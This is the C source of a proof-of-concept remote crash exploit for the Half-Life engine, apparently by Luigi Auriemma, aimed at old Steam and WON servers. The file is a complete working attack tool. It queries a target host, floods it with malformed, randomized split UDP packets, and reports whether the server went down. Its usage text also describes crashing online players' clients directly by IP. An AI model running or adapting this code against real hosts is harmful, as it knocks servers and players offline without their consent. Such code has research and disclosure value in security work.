/*

by Luigi Auriemma

*/

#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>
#include <time.h>

#ifdef WIN32
    #include <winsock.h>
    #include "winerr.h"

    #define close   closesocket
    #define sleep   Sleep
    #define DELAY   sleep(100)
#else
    #include <unistd.h>
    #include <sys/socket.h>
    #include <sys/types.h>
    #include <arpa/inet.h>
    #include <netinet/in.h>
    #include <netdb.h>

    #define stricmp strcasecmp
    #define DELAY   usleep(100000)
#endif



#define VER         "0.2.1"
#define BUFFSZ      4010        // max Half-life packet in recvfrom()
#define PORT        27015



void send_boom_pck(int sd, uint8_t *boom, int boomsz, int pck, struct sockaddr_in *peer);
int rndstr(uint8_t *data, int len, uint32_t *seed);
int send_recv(int sd, uint8_t *in, int insz, uint8_t *out, int outsz, struct sockaddr_in *peer, int err);
int timeout(int sock, int sec);
int halflife_query(uint8_t *data, int size);
int source_query(uint8_t *data, int size);
uint32_t resolv(char *host);
void std_err(void);



uint32_t    myseed;



int main(int argc, char *argv[]) {
    struct  sockaddr_in peer;
    int         sd,
                i,
                len,
                info,
                boomsz;
    uint16_t    port = PORT;
    uint8_t     buff[BUFFSZ + 1];
    static const uint8_t
                info1[] = "\xff\xff\xff\xff" "infostring\n\0",
                info2[] = "\xff\xff\xff\xff" "T" "Source Engine Query\0";

#ifdef WIN32
    WSADATA    wsadata;
    WSAStartup(MAKEWORD(1,0), &wsadata);
#endif

    setbuf(stdout, NULL);

    fputs("\n"
        "Half-Life engine remote server/client crash "VER"\n"
        "  Steam before 07 July 2004 and any WON version\n"
        "Found by: Terry Henning (aka Soul Beaver)\n"
        "Code by:  Luigi Auriemma\n"
        "          e-mail: aluigi@autistici.org\n"
        "          web:    aluigi.org\n"
        "\n", stdout);

    if(argc < 2) {
        printf("\n"
            "Usage: %s <host> [port(%hu)]\n"
            "\n"
            "Use port 27005 to directly crash online clients through their IP\n"
            "\n", argv[0], port);
        exit(1);
    }

    if(argc > 2) port = atoi(argv[2]);
    peer.sin_addr.s_addr = resolv(argv[1]);
    peer.sin_port        = htons(port);
    peer.sin_family      = AF_INET;

    printf("- target %s:%hu\n",
        inet_ntoa(peer.sin_addr), ntohs(peer.sin_port));

    sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
    if(sd < 0) std_err();

    info = 1;
    printf("- query server with the classical Half-life query\n");
    len = send_recv(sd, (uint8_t *)info1, sizeof(info1), buff, BUFFSZ, &peer, 0);
    if(len >= 0) {
        halflife_query(buff, len);
    } else {
        info = 2;
        printf("- query server with the Steam query\n");
        len = send_recv(sd, (uint8_t *)info2, sizeof(info2), buff, BUFFSZ, &peer, 1);
        source_query(buff, len);
    }

    myseed = ~time(NULL);


    printf("\n"
        "- send new BOOM packets\n"
        "\n"
        "  num   split\n"
        "-------------\n");

    for(i = 0; i < 256; i++) {
        for(boomsz = myseed % BUFFSZ; boomsz < 3000; boomsz += 12);
            // on Linux it's enough also a packet like the following
            // "\xfe\xff\xff\xff" "\x00\x00\x00\x00" "a"

        send_boom_pck(sd, buff, boomsz, i, &peer);
    }


    printf("\n"
        "- send old BOOM packet\n");

    send_boom_pck(sd, buff, 8, 0, &peer);


    printf("- check if server is crashed:\n");
    if(info == 1) {
        len = send_recv(sd, (uint8_t *)info1, sizeof(info1), buff, BUFFSZ, &peer, 0);
    } else {
        len = send_recv(sd, (uint8_t *)info2, sizeof(info2), buff, BUFFSZ, &peer, 0);
    }
    if(len < 0) {
        printf("\n  Server IS vulnerable!!!\n\n");
    } else {
        printf("\n  Server doesn't seem vulnerable\n\n");
    }

    close(sd);
    return(0);
}



void send_boom_pck(int sd, uint8_t *boom, int boomsz, int pck, struct sockaddr_in *peer) {
    rndstr(boom, boomsz, &myseed);
    *(uint32_t *)(boom + 0) = htonl(0xfeffffff);
    *(uint32_t *)(boom + 4) = myseed;
    boom[4] &= 0xfe;    // 0xffffffff sometimes doesn't crash the server

    if(boomsz > 8) {
        printf("  %-3d   %u/%u\n", pck, (pck >> 4) + 1, pck & 15);
        boom[8] = pck;
    }

    if(sendto(sd, boom, boomsz, 0, (struct sockaddr *)peer, sizeof(struct sockaddr_in))
      < 0) std_err();

    DELAY;
}



int rndstr(uint8_t *data, int len, uint32_t *seed) {
    uint32_t    rnd;
    uint8_t     *p = data;

    rnd = *seed;

    while(len--) {
        rnd = (rnd * 0x343FD) + 0x269EC3;
        *p++ = rnd >> 16;
    }

    *seed = rnd;
    return(p - data);
}



int send_recv(int sd, uint8_t *in, int insz, uint8_t *out, int outsz, struct sockaddr_in *peer, int err) {
    int     retry,
            len;

    if(in && !out) {
        if(sendto(sd, in, insz, 0, (struct sockaddr *)peer, sizeof(struct sockaddr_in))
          < 0) std_err();
        return(0);

    } else if(in) {
        for(retry = 2; retry; retry--) {
            if(sendto(sd, in, insz, 0, (struct sockaddr *)peer, sizeof(struct sockaddr_in))
              < 0) std_err();
            if(!timeout(sd, 1)) break;
        }

        if(!retry) {
            goto timeout_received;
        }

    } else {
        if(timeout(sd, 3) < 0) {
            goto timeout_received;
        }
    }

    len = recvfrom(sd, out, outsz, 0, NULL, NULL);
    if(len < 0) std_err();
    return(len);

timeout_received:
    if(err) {
        printf("\nError: socket timeout, no reply received\n\n");
        exit(1);
    }
    return(-1);
}



int timeout(int sock, int sec) {
    struct  timeval tout;
    fd_set  fd_read;
    int     err;

    tout.tv_sec  = sec;
    tout.tv_usec = 0;
    FD_ZERO(&fd_read);
    FD_SET(sock, &fd_read);
    err = select(sock + 1, &fd_read, NULL, NULL, &tout);
    if(err < 0) std_err();
    if(!err) return(-1);
    return(0);
}



int halflife_query(uint8_t *data, int size) {
    int         nt    = 1,
                len,
                proto = 0;
    uint8_t     *p,
                *limit;

    limit  = data + size;
    *limit = 0;
    data  += 4;

    len = strlen(data);
    if(len < size) data += len + 1;

    for(p = data; (data < limit) && p; data = p + 1, nt++) {
        p = strchr(data, '\\');
        if(p) *p = 0;

        if(nt & 1) {
            printf("%s\n", data);
            if(proto < 0) proto = atoi(data);
        } else {
            if(!*data) break;
            printf("%30s: ", data);
            if(!stricmp(data, "protocol")) proto = -1;
        }
    }

    return(proto);
}



int source_query(uint8_t *data, int size) {
    int     proto;

    data += 5;
    printf("%30s: %s\n",        "Address",          data);   data += strlen(data) + 1;
    printf("%30s: %s\n",        "Hostname",         data);   data += strlen(data) + 1;
    printf("%30s: %s\n",        "Map",              data);   data += strlen(data) + 1;
    printf("%30s: %s\n",        "Mod",              data);   data += strlen(data) + 1;
    printf("%30s: %s\n",        "Description",      data);   data += strlen(data) + 1;
    printf("%30s: %hhu/%hhu\n", "Players",          data[0], data[1]);  data += 2;
    proto = *data;
    printf("%30s: %hhu\n",      "Version",          *data++);
    printf("%30s: %c\n",        "Server type",      *data++);
    printf("%30s: %c\n",        "Server OS",        *data++);
    printf("%30s: %hhu\n",      "Password",         *data++);
    printf("%30s: %hhu\n",      "Secure server",    *data);
    return(proto);
}



uint32_t resolv(char *host) {
    struct      hostent *hp;
    uint32_t    host_ip;

    host_ip = inet_addr(host);
    if(host_ip == INADDR_NONE) {
        hp = gethostbyname(host);
        if(!hp) {
            printf("\nError: Unable to resolv hostname (%s)\n", host);
            exit(1);
        } else host_ip = *(uint32_t *)hp->h_addr;
    }
    return(host_ip);
}



#ifndef WIN32
    void std_err(void) {
        perror("\nError");
        exit(1);
    }
#endif


